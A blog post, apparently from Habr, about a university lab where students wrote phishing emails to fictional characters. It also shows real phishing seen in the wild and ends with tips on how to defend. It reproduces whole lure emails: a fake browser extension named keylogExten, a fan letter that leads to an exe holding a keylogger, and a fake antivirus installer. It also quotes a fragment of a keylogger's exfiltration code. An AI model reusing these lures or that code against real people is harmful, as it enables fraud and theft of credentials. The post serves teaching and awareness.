Shoemaker without shoes. How students wrote phishing emails

    Hi, Habr! I am the editor of this blog, and sometimes I also teach virology at the university.

    I decided to diversify the educational process and came up with several tasks for fifth-year students - such that practice and relevance, and not write off the code from 2003. One of the tasks is to create and send phishing emails to fictional people who could exist in reality. After all, if you don’t know how to attack, you won’t know how to defend, right?

    I will show the best of what happened: what letters scammers could send on behalf of Yandex.Money, how students pretended to be services, and for dessert - techniques that scammers use right now (for example, several letters received by our vigilant users).

    A warning

    Do not engage in phishing. Formally, this is a fraud, it is prosecuted under article 159.6 of the Criminal Code of the Russian Federation. Laboratory work was carried out under controlled conditions, letters were sent to pre-prepared boxes, access to which is available only from the author of the post. Students are warned about possible liability for phishing mailing outside the lab.

    All characters are fictional, all coincidences with real people and organizations are random. All logos, trademarks and names belong to their respective owners.

    I already told a similar story just over a year ago. Since then, I have become the editor of Habrablog. I work a lot with various departments, including the department of information security. The whole company, which is logical, is about money, and security is appropriately appropriate here - the security service (SB) protects everything and everyone inside, and also stops the attempts of fraudsters to outrage on behalf of the service.

    And since I decided to give the students such a task, I wondered if they could relatively honestly take away fictional money from fictional characters. Here, motivation is important - all this is done only for educational purposes, so that future security experts understand what threats are and how to protect themselves from them.


    All people are different - with different experiences, knowledge in IT and different beliefs in people - so I came up with three characters and asked the students to find an approach to them. The restrictions were purely technical - the letter should be sent to the specified box, it should not get into spam, and there should be a way to collect personal data. Which ones - at the discretion of the student.

    The full laboratory assignment is under the spoiler.

    Job on the lab
    Нужно отправить три письма трём выдуманным персонажам.
    1. Письма нужно действительно отправить на указанные почтовые ящики. Через нужно выслать список адресов, с которых ушли письма.
    2. Считается, что персонажи открывают письма на рабочих компьютерах в рабочее время.
    3. При написании нужно использовать индивидуальные особенности персонажей, указанные в задании. По умолчанию считается, что письмо, написанное кому угодно и без деталей, не идет в зачет.
    4. Цель атаки — доступ во внутреннюю сеть или к данным (почта, календари, архивы, финансовая информация) организации, в которой работает каждый из персонажей. Меньший приоритет в получении личных данных персонажей.
    5. От кого, под каким предлогом и как будет совершаться атака, остаётся на ваше усмотрение. Использование доп. средств (скрипты, документы с макросами, софт) идет в зачет при наличии подходящей легенды.
    6. Письма, попавшие в спам, не идут в зачёт.
    7. Письмо, ссылка в котором никуда не ведёт, не идёт в зачёт.
    В отчете должны быть:
    1. Тексты или скриншоты писем
    2. Описание того, почему каждому из пользователей было отправлено письмо
    3. Какую информацию планировалось получить после отправки писем
    4. Какую информацию удалось получить после отправки писем
    5. Список адресов, с которых отправлена почта

    Valeria Valerievna Golova, 31 years old, Ust-Kamenogorsk

    Lawyer in the private law firm "Soft Sign". Mail -

    Valeria is a humanist by nature, but a techie in the shower. She graduated from the Ust-Kamenogorsk technical school of information technology and works as a lawyer-sysadmin in a private company of four people.

    Valeria loves to keep tube images on social networks, keeps a blog on LiveJournal, where she shares dreams, and on Sundays she goes to free concerts, which she finds in the group “Free concerts of Ust-Kamenogorsk”.

    Husanboy Erdashevich Sotvondiyev, 19 years old, St. Petersburg

    Taxi driver in Timoshinsky taxi cab. Mail -

    Husanboy came to Petersburg from Urgench, where he worked as a taxi driver for 3 years. Now continues to do the same in St. Petersburg on the old Kia Rio, which he inherited from a friend. Previously, Husanboy recorded rap tracks and published them without a pseudonym, but now he just follows new artists, so he is registered on all the popular thematic sites.

    Albert M. Alberlive, 54, Khabarovsk

    Self employed Mail -

    Albert Mikhailovich has seen a lot in his life - he sent letters to Mavrodi, charged water with Kashpirovsky and was a platinum agent of Tiens with a network of 22 people. Now he is waiting for his retirement again and, in order not to waste time in vain, he decided to invest in Bitcoins and Cashbury. Albert Mikhailovich has profiles on all social networks, e-wallets in all Russian-language services and an incredible faith in people and technology.

    They sent

    This year, students had less time - so the first letters arrived rather quickly. However, most of them reflect the real phishing patterns that students found on the Internet and tried to apply the tasks to the condition.

    Albert Alberlive

    Honestly, this character intrigued me most of all - what will happen, what letters and from which services will fly? Financial pyramids, e-wallets, cryptocurrencies? Students did not disappoint - in the "Inbox" were letters on all these topics and from the majority of popular payment systems. I want to show every single one, but, unfortunately, this is impossible.

    Phishing on behalf of Yandex.Money

    First of all, I was interested in letters on behalf of Yandex. Money.

    All students who sent letters on behalf of the service applied a similar approach - to announce a new product that will save them from all problems and help them earn. As I will show later, this is not entirely consistent with the real behavior of the scammers.

    Let me remind you that all the official Yandex.Money applications live in a special section on the Yandex website , and the announcements of new pieces are in the press office . Check there if you suddenly see an unusual or shocking announcement about Yandex.Money in an incomprehensible source.

    And now let's see what is wrong with these letters. Especially for this, I caught in the corridor Natasha, the lead editor of Money, and showed screenshots. Natasha knows everything about how they write and do not write in Money, which I used.

    The question was simple: how to understand that it was not written by us? I pass the microphone:


    Top-level: it is not clear why the user generally receives a letter on this topic; a letter about what cryptocurrencies are generally good at, but how they can be useful to me is unclear.

    According to the text: exclamation marks (we have almost none), clerical on the clerk (ensuring the security of transactions -) + negligence with typography.


    - Name + mail in circulation.

    - Uncertainty: what does "compromised" mean? Well, where am I?

    - Again clerical.

    - What is “confirmed recovery”, I would like to know.

    - No link header + button (we usually try to ensure that this combination gives a general idea of ​​the essence).

    Yandex.Money technical support

    Everything is bad here: from small things like a careless design to the main message (why, otherwise, the account cannot be restored - this is uncovered blackmail).

    In general, Natasha summed up, we do not write. Let's move on to other notable examples.

    Hot Letters for Albert

    Новый инновационный майнер

    Прогрессируйте без забот.
    Вы всегда хотели прикоснуться к миру крипто валют, но не знали с чего начать? Используйте наш майнер во время того, когда не пользуйтесь компьютером. Даже время будет работать на вас.
    Все для начинания в одном наитии \

    В этом письме прекрасно всё — не хватает только нормальной кнопки с призывом к действию. Вместо неё маленькая ссылка внизу, которая еще и не кликается. В общем, полный провал потенциальных криптогениев крипторынка.

    Обещанные плюшки — не прилагайте усилий, всё работает само, без вложений. Ну да, конечно.

    Инвестиционная трейд-платформа нового поколения

    Нужны ли здесь какие-то комментарии?

    Фотобанкир из фотобанка

    Как добавить письму солидности? Конечно, использовать фотографии из фотобанков. Удивительно, что ниже в этом же письме нет улыбающихся людей в деловых костюмах.

    Valeria Head

    Valeria sent many letters from LiveJournal, VK, from lucid dream courses, websites with events, and even several messages from fans of her blog.
    Hot letters for Valeria

    Рекламная платформа

    ЖЖ не стоит на месте и развивается. Валерии предложили выбрать рекламные категории — почему бы не воспользоваться таким прекрасным предложением?

    «Злоумышленник» постарался — ссылка в письме ведет на сайт на бесплатном хостинге, где в стилях ЖЖ нарисовали форму для ввода персональных данных и карточной информации.

    Очень легко ничего не заподозрить — но достаточно проверить адресную строку. К тому же когда я в первый раз открыл эту ссылку и ввёл выдуманную карту, увидел вот такой поп-ап:

    Предупреждают не зря — сайт действительно опасен.

    Такие «сайты» на бесплатных хостингах долго не живут и к тому же заполнены водяными знаками. А на платном хостинге (и с доменом второго уровня) можно отправить жалобу на фишинг и мошенничество. Как показывает практика, такие сайты активно блокируются — например, наша СБ регулярно рассылает заявки регистраторам, когда обнаруживает какую-нибудь новую мошенническую схему.

    Десктопное приложение Живого Журнала

    Ребята не поленились и написали даже десктопное приложение — ну какие же молодцы. Даже просмотр публикаций без интернета прикрутили.

    Ссылка ведет на ехе-файл: http://ххх.193.52.92/livejournal_desktop_1.0.3b.exe. Загружать его я, конечно, не буду.

    Перед установкой любых приложений из сомнительных источников (а почта — очень сомнительный источник) сходите на официальный сайт и проверьте, есть ли оно там вообще. И если есть, установите оттуда.

    Браузерное расширение

    Я люблю своих студентов и практически не ограничиваю их фантазию. Это приводит к тому, что приходят и такие письма. Привожу целиком — настолько это прекрасно.

    > Здравствуйте, Валерия Валерьевна.
    Вам пишет команда молодых разработчиков сервиса "Your Favourite Song".
    Мы создаем культурную среду, в которой каждый может себе найти занятие по-вкусу!
    В данный момент мы разрабатываем приложение для браузера, которое является агрегатором всех культурных событий, что проходят в нашем замечательном городе!
    Начать мы решили с создания подборок всех бесплатных и платных концертов нашего города. Зная о Вашем увлечении музыкой из блога в ЖЖ, мы решили предоставить Вам
    замечательную возможность опробовать наше расширение одной из первых, и возможно, послужить благому делу и оставить у себя в ЖЖ отзыв, как только расширение перейдет из
    стадии закрытого бета-тестирования в открытый бета-тест.
    Для того чтобы установить данное расширение - перейдите по ссылке и скачайте с нашего приватного хранилища расширение, затем установите его. Инструкцию по установке мы
    напишем ниже.
    > 1. Перейдите по ссылке  и скачайте zip-архив.
    2. Распакуйте zip-архив в любую удобную папку.
    3. Зайдите в ваш браузер во вкладку расширения.
    4. Нажмите на кнопку "добавить стороннее распакованное расширение".
    5. Перейдите в папку, куда Вы распаковали наше расширение и укажите путь к папке keylogExten.
    6. В течение недели мы добавим вас в нашу базу данных и удаленно активируем функционал нашего расширения.
    7. Наслаждайтесь удобным сервисом!
    > С уважением,
    команда "Your Favourite Song".

    Здесь подход радикальнее всего, что присылали в этом году. По ссылке — сокращалка, которая редиректит на облачную хранилку. Там лежит браузерный кейлоггер, запакованный в два архива. В нём — простой event listener, который работает на jquery, слушает события keydown, собирает коды в пакеты и отправляет их на некий сервер.

    functionsendSymOnServer(page, data) {
           var xhr = new XMLHttpRequest();
           var body = 'page = ' + encodeURIComponent(page) +
               '&data = ' + encodeURIComponent(data);
 "POST", '', true);
           xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');

    Естественно, никогда не устанавливайте лишних расширений — особенно тех, в описании которых есть слово keylog.

    Пиши, сокращай

    Как и в прошлом году, не обошлось без гениального копирайтинга. Пока я писал эту статью, выяснилось, что копирайтером был кто-то еще, а студент взял текст из интернета.

    К этому моменту все контекстные рекламные баннеры показывают мне всякое про осознанные сновидения. И вам, кажется, тоже. Не благодарите.

    Письма от поклонников

    Как по мне, самая опасная разновидность фишинга. Злоумышленник разведал обстановку и бьет по больным местам — всем бывает сложно справиться с похвалой, лестью, признанием и не начать отвечать мошеннику.

    Вот пример:

    Добрый вечер, Валерия.
    Прошу прощения за беспокойство, Меня зовут Дмитрий, и в первую очередь хочется поблагодарить Вас за Ваши тёплые посты в журнале.
    Наверное, я бы так и оставался молчаливым читателем, вдохновляющимся Вашим примером, но Ваш вчерашний сон всё не выходит у меня из головы.
    Он напомнил мне работы талантливого художника-визионера по имени Фрейдун Рассули, и в большей степени — его картину "Путешествие домой".
    Как и в Вам, этому художнику близка тема космического единства: он был уверен в том, что любое творение является продуктом синхронизации наших энергий со Вселенной.
    Мне подумалось, что Вам будет интересно подробнее ознакомиться с его творчеством, поэтому я подобрал самые утончённые и глубокие из его работ.
    К сожалению, не могу прикрепить их все разом, но могу предложить Вам архив с моей собственной подборкой.
    Уверен, Вы сможете найти среди этих удивительных картин немало сходства с Вашими снами. И, мне кажется, они будут замечательно смотреться в Вашем блоге.
    С наилучшими пожеланиями,
    Ваш постоянный читатель.

    По ссылке лежит файл Рисунки.exe, в котором, конечно, нет никаких рисунков, но есть кейлоггер.

    И ещё один поклонник:

    > Здравствуйте, Валерия Валерьевна.
    > Меня зовут Дмитрий, можно просто Дима.
    > Я немного следил за вами на ЖЖ. У вас весьма удивительные сны. Вы же ведь знаете, что каждый сон может что-то значить? Я немного в этом разбираюсь и даже иногда веду записи
    о толковании снов в своем ЖЖ. Мне бы очень хотелось поделиться ими с вами. А также побольше пообщаться с вами. К вам можно обращаться на "ты"?
    С нетерпением жду ваших высказываний по поводу моих мыслей.
    > С уважением,
    > Ушков Дмитрий.

    Под ссылкой очередная форма авторизации в ЖЖ на бесплатном хостинге (до точки — livejjournal). Там есть https, так что браузеры не ругнутся, но внимательно смотреть всё-таки нужно.


    By the way, after the first few letters, Yandex sent a letter about how to distinguish good letters from letters of fraudsters. Watch out.

    Husanboy Sotvondiyev

    The students were well aware of the comic spirit of the assignment and donated things that caused me a range of emotions from nervous laughter to bewilderment. In general, it seems to me, they did well. The character received letters from rap sites, fines from public services portals, letters from taxis (among them there was only one called Timoshinsky) and, according to tradition, several personal letters.

    Hot letters for Husanboya

    Конкурс неизвестных рэп-исполнителей

    Обращаюсь в первую очередь к неизвестным рэп-исполнителям, которые пришли на эту страницу поучаствовать в конкурсе.

    Йоу, ребята, никогда не реагируйте на такие письма, в этом нет никакого смысла.

    > Здравствуйте Хусанбой!
    > Вас беспокоит тех.поддержка сайта молодых исполнителей хип-хоп музыки. За Вашей учетной записью была замечена подозрительная активность, поэтому Ваш аккаунт был заблокирован. Для восстановления доступа к аккаунту и участия в последующем конкурсе неизвестных исполнителей с призом в 6 млн.рублей Вам следует подтвердить свою учетную запись и предоставить данные для участия в конкурсе в форме ниже. Все введенные Вами данные будут тщательно проверяться для осуществления безопасности конкурса и его справедливого проведения. Также должны Вас предупредить о том, что до окончания конкурса изменение и восстановление логина/пароля и личной информации в учетной записи невозможно, поэтому для логина/пароля вводите то, что Вы точно не забудете или вводите ежедневно, а информацию о себе только верную.

    Если вы смогли дочитать этот текст, ни разу не перескакивая глазами, расскажите, что там. Ссылка после письма ведёт на гугл-форму из 30 полей (троянский слон!), самые примечательные из которых:

    • Логин-пароль.
    • Программы, которые использовали при создании (записи) трека *.
    • Эл.почта/ссылки в соц.сетях сотрудников, которым возможно было бы интересно направление хип-хоп *.
    • Ф.И.О. сотрудников, которым возможно было бы интересно направление хип-хоп *.

    Никогда не вводите на незнакомых сайтах ФИО сотрудников, которым, возможно, было бы интересно направление хип-хоп.

    Антивирус Сотвондиева

    Добрый день!
    В связи с ужесточением политики обработки персональных данных в нашем таксопарке всем сотрудникам необходимо использование сертифицированное средство безопасности.
    В качестве такого средства в нашей компании был выбран Kaspersky Endpioint Security, имеющий сертификаты соответствия ФСБ СФ/019-3471 и ФСТЭК №3025.
    Скачать установочные файлы данного средства можно по следующей ссылке:
    Просьба сотрудников самостоятельно скачать и установить Kaspersky Endpoint Security. В конце месяца в ходе плановой проверки будет произведена активация средства специалистами нашего отдела.
    Отдел технической безопасности таксопарка "Тимошинский".

    Как хорошо, что мошенники стесняются использовать спеллчекеры. Это помогает выявлять ересь в инбоксе и стирать её, не дочитывая. Естественно, ссылка ведет не туда — хотя и тоже на экзешник.

    Неизвестные рэп-исполнители и где они обитают

    Скорее жмем ссылку, смотрим, а там...

    Эта бригада студентов решила обозначить то, как поймать человека на фишинге. Это не лишено смысла — здесь важно понимание механики процесса, поэтому лабу я им, хоть и не без колебаний, засчитал.

    Повторю ещё раз — не вводите никакие данные о банковских картах на непроверенных сайтах.

    Съемки в рэперском клипе

    Захожу, полный решимости сняться в клипе, а там:

    > Error: This account has been suspended.

    Details about the account owner:
    Name: Phishing Detected

    Как видите, сервисы борются с фишингом еще до того, как я о нём рассказал на Хабре. Поэтому о том, что было на сайте, я узнал только из отчёта. Как-нибудь в другой раз расскажу о том, как я принимаю отчёты, — это отдельная большая история.

    Истеричный тест-драйв

    Kia Центр Санкт-Петербург cообщает, что вам выпал уникальный шанс взять в аренду совершенно новый автомобиль Kia Quoris. Это абсолютно новая модель бизнес-класса, с соверешенно новым двигателем и переработанной системой подвевски и трансмисси. И что самое главное, вы получаете беспрецедентную возможность получить данный автомобиль на целый МЕСЯЦ!!! В личное пользование!!! Проедьте на нем в городе, опробуйте дальние поездки, оценить качество и надежность нашего нового автомобиля!

    Ещё в письме была красивая картинка с этим автомобилем и ссылка на онлайн-форму для получения разной информации.

    Студент использовал и информацию о том, что персонаж ездит на машине друга, и подогрел интерес потенциальной жертвы тем, что осталось всего 3 машины. В общем, самое время бежать-торопиться и записываться на бесплатный тест-драйв.

    А лучше вспомнить, что ничего бесплатного в интернете не бывает, и не вестись на сомнительные письма.

    What phishing looks like in the wild

    All the examples above are the fantasy of my students, and they relate to reality only in that you can write and send them all. It’s pretty easy to protect yourself - just check the links carefully, don’t download extraneous files from attachments and pay attention to typos in the text. And if you do not enter any personal data on incomprehensible sites, then you can live your whole life without knowing how it is when you steal money or take a microloan for a passport scan.

    I asked colleagues from the Security Council to show real phishing emails that live in the wild right now. These are just a couple of examples that show that scammers can go for very different tricks to get your money. In fact, they are much more, so you need to be ready for anything.

    Your wallet is replenished

    The user receives a message that his wallet is replenished. In the comments to the payment - advertising podkilka and a link to the site where you can supposedly get a thousand dollars a day, without doing anything.

    It turns out that fraudsters can not only fake such letters. The fact is that a forged letter will most likely not pass through the spam filter in the mail. But an automatic letter from the service, formed after the real micropayment, can even reach the account.

    The link from the comment, as a rule, leads to the site, where people are trying to fairly fairly take away money from the population.

    Your IP address has been listed

    A letter allegedly from Yandex.Money technical support. You already know how to distinguish it from the present - thanks to Natasha.

    What else happens?

    Phishing is, of course, not just about letters.

    One example of something besides us was sent by a blog reader. Imagine - this is fraudulent advertising on Instagram, which leads to a fraudulent public in VK, which leads to a fraudulent landing page with fraudulent polls, for which fraudulent money is allegedly paid.

    Of course, in fact, do not pay.

    This is not a real advertisement.

    There is even a condition in this thread “send a link to 20 friends in WhatsApp to continue.” But when big money looms, it is very difficult to hold back.

    At some point, after a lot of questions in the spirit of “What brand of car do you like better?” And fake reviews of supposedly real people (well, those with photo stock avatars) of the hapless user will be pleased with the news:

    “You earned 80,000 rubles, but we cannot transfer them in one payment — only two. Therefore, you need to pay 150 rubles for sending money. ”

    Of course, no one will translate anything, so you do not translate anything.

    How to defend?

    Here are some simple tips:

    1. Do not download or run attachments from emails that you are not sure about.
    2. Check the address of the sender and the links in the letter before clicking on them - in the browser for this there is a status bar where you can see where the link leads.
    3. Do not enter your personal data - logins, passwords, card numbers and any other information - on foreign sites. If you have the slightest suspicion, close the page.
    4. None of the support staff will ever ask you for a password, pin code or SMS code that you recently accidentally received.
    5. Do not upload scans of documents to the Internet without any obvious need.
    6. Enable two-factor authentication for your accounts. This can be SMS, biometric authentication or confirmation on a mobile device.
    7. If a dubious letter came to corporate email, tell the admin or security service about it. There is a possibility that someone is conducting a targeted attack on the company.
    8. Be carefull. No one will accidentally send you a letter with an annual financial report or salaries of company employees.

    Show these rules to friends, acquaintances and, especially, older relatives. And thank you for reading to the end. Do not be fooled.

    Also popular now: